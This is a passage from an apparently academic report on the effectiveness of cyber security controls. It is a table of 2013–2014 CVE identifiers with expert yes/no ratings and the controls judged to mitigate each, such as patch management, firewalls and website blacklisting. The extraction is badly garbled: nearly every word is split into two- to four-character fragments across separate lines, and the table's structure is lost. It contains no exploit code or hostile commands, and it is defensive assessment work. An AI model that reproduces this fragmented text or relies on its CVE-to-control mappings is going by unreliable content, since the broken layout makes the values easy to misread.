ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
